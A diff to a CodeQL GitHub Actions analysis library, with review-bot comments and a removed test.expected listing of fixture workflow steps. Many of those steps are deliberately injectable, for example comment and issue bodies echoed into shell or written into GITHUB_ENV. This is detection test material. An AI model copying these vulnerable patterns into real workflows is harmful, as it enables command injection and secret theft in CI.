@@ -2,6 +2,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper private import codeql.actions.config.Config +private import codeql.actions.DataFlow /** * Gets the length of each line in the StringValue . @@ -433,7 +434,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } ExternalJobImpl getACaller() { - result.getCallee() = this.getLocation().getFile().getRelativePath() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 96568f86db33..fbaf44c282f4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -72,7 +72,7 @@ class CallNode extends ExprNode { CallNode() { this.getCfgNode() instanceof DataFlowCall } - string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } } /** diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 9205675ac0fe..fe5a2df8dd0a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
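Review bot: `getACaller()` now discovers callers solely through `DataFlow::CallNode.getCalleeNode()`, so a reusable workflow whose `uses:` reference `viableCallable` cannot resolve ends up with no caller at all and is never promoted to privileged, which turns an unresolved call into a silent false negative for the checkout and injection queries instead of the previous file-path match. Unless the dataflow resolution is known to be a strict superset of the old clause, keep it as a fallback inside the same predicate: `or result.getCallee() = this.getLocation().getFile().getRelativePath()`. The AST module now also imports `codeql.actions.DataFlow`, which itself builds on this AST; QL tolerates the import cycle as far as I know, but a one-line comment on the new import explaining why the AST layer needs call resolution would help the next reader. The predicate has no QLDoc either; `/** Gets a job that invokes this reusable workflow, as resolved by the dataflow call graph. */` would do.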
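Review bot: Replacing `string getCallee()` with `DataFlowCallable getCalleeNode()` on `CallNode` drops a public predicate from `DataFlowPublic.qll`, so any query or library outside this repository that matched on the callee name stops compiling; the diffstat suggests no in-tree users remain, but a one-release shim costs a single line: `deprecated string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() }`. The new predicate also lacks QLDoc; `/** Gets the callable this call resolves to; presumably has no result when the target cannot be resolved. */` states the partial-resolution behaviour that callers such as `getACaller()` now depend on. The `Node` suffix is slightly misleading since the result is a `DataFlowCallable` rather than a `DataFlow::Node`; `getCallable()` would read more accurately, though that is a naming preference.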
@@ -1,1574 +1 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| 
.github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 
| Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses 
Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee 
-a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n 
echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && 
npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 
| github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | 
github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | 
-| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo 
REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | -| 
.github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | 
-| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | 